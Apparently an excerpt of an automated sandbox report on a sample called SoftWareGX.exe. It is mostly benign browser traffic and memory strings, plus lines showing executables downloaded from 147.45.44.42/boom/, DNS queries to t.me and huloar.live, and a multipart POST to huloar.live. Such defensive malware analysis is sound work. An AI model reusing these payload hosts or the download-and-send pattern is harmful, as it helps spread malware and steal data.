                Source: global trafficHTTP traffic detected: GET /bundles/v1/distribution/latest/experience.10673c9254bd20a1cfe4.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /npm/@shoelace-style/shoelace@2.12.0/cdn/themes/light.css HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://apps.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BBj8zm6.img?w=16&h=16&q=100&m=6&f=png&u=t HTTP/1.1Host: img.s-msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /image?url=4rt9.lXDC4H_93laV1_eHHFT949fUipzkiFOBH3fAiZZUCdYojwUyX2aTonS1aIwMrx6NUIsHfUHSLzjGJFxxsG72wAo9EWJR4yQWyJJaDb6rYcBtJvTvH3UoAS4JFNDaxGhmKNaMwgElLURlRFeVkLCjkfnXmWtINWZIrPGYq0-&format=source&w=75 HTTP/1.1Host: images-eds-ssl.xboxlive.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://apps.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /boom/tvhaqk.exe HTTP/1.1fDsdWpC1Kr1ADlJEQf5TUrSTrY2h2u41sMkrsfhwLwlxIQCB6y: VtAoUiLGBN8JuIRrrC1tFjmxppXCaGpKltJpaX9l7d4gYg3aW4Host: 147.45.44.42Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /boom/uykb.exe HTTP/1.1fDsdWpC1Kr1ADlJEQf5TUrSTrY2h2u41sMkrsfhwLwlxIQCB6y: VtAoUiLGBN8JuIRrrC1tFjmxppXCaGpKltJpaX9l7d4gYg3aW4Host: 147.45.44.42
                Source: Favicons.21.drString found in binary or memory: https://edge.microsoft.com/favicon/v1?client=chrome_desktop&nfrp=2&check_seen=true&size=32&min_size=16&max_size=256&fallback_opts=TYPE,SIZE,URL&url=https://www.facebook.com/&origin=PinningWizard equals www.facebook.com (Facebook)
                Source: Favicons.21.drString found in binary or memory: https://edge.microsoft.com/favicon/v1?client=chrome_desktop&nfrp=2&check_seen=true&size=32&min_size=16&max_size=256&fallback_opts=TYPE,SIZE,URL&url=https://www.youtube.com/&origin=PinningWizard equals www.youtube.com (Youtube)
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
                Source: 000003.log11.21.drString found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
                Source: 000003.log11.21.drString found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
                Source: 000003.log11.21.drString found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000003.1460673087.000046FC03D79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 0www.youtube.com/ equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000003.1460673087.000046FC03D79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 0www.youtube.com/F equals www.youtube.com (Youtube)
                Source: Favicons.21.drString found in binary or memory: ?https://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: chrome.exe, 00000011.00000003.1426187671.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1426454243.000046FC0311E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                Source: chrome.exe, 00000011.00000003.1426187671.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1426454243.000046FC0311E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                Source: Favicons.21.drString found in binary or memory: https://edge.microsoft.com/favicon/v1?client=chrome_desktop&nfrp=2&check_seen=true&size=32&min_size=16&max_size=256&fallback_opts=TYPE,SIZE,URL&url=https://www.youtube.com/&origin=PinningWizard equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000003.1460673087.000046FC03D79000.00000004.00000800.00020000.00000000.sdmp, Favicons.21.drString found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000003.1460673087.000046FC03D79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/- equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000003.1451551802.000046FC03314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1460938291.000046FC03DB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000003.1460938291.000046FC03DB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytcaF equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000003.1460938291.000046FC03DB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytcaogl equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000003.1460673087.000046FC03D79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com/ equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000003.1460673087.000046FC03D79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com/F equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: t.me
                Source: global trafficDNS traffic detected: DNS query: huloar.live
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: global trafficDNS traffic detected: DNS query: apis.google.com
                Source: global trafficDNS traffic detected: DNS query: play.google.com
                Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                Source: global trafficDNS traffic detected: DNS query: c.msn.com
                Source: global trafficDNS traffic detected: DNS query: api.msn.com
                Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                Source: global trafficDNS traffic detected: DNS query: www.dropbox.com
                Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ecbasjekf37qieu37qqiUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: huloar.liveContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Cache: CONFIG_NOCACHEAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionX-MSEdge-Ref: Ref A: AF3910C8E8B84784A9AFAC09969FD93E Ref B: BL2AA2010201023 Ref C: 2025-01-30T17:11:31ZDate: Thu, 30 Jan 2025 17:11:31 GMTConnection: closeContent-Length: 0
                Source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003D44000.00000004.00000800.00020000.00000000.sdmp, SoftWareGX.exe, 00000005.00000002.1305403965.0000000003D6B000.00000004.00000800.00020000.00000000.sdmp, SoftWareGX.exe, 00000005.00000002.1305403965.0000000003D4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.42
                Source: csc.exe, 00000006.00000003.1281119543.0000000005017000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000003.1281481214.0000000004F41000.00000004.00001000.00020000.00000000.sdmp, csc.exe, 00000006.00000003.1281713316.000000000501D000.00000004.00000020.00020000.00000000.sdmp, m3uz1vzd.0.cs.5.dr, m3uz1vzd.dll.6.drString found in binary or memory: http://147.45.44.42/boom/tvhaqk.exe
                Source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003D6B000.00000004.00000800.00020000.00000000.sdmp, SoftWareGX.exe, 00000005.00000002.1306553287.0000000006B60000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 0000000A.00000003.1296433045.0000000004D37000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000A.00000003.1296398173.0000000004D27000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000A.00000003.1296319511.0000000004D37000.00000004.00000020.00020000.00000000.sdmp, yomkssf4.dll.10.dr, yomkssf4.0.cs.5.drString found in binary or memory: http://147.45.44.42/boom/uykb.exe
                Source: csc.exe, 0000000A.00000003.1297231127.00000000058E1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.42/boom/uykb.exe0
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
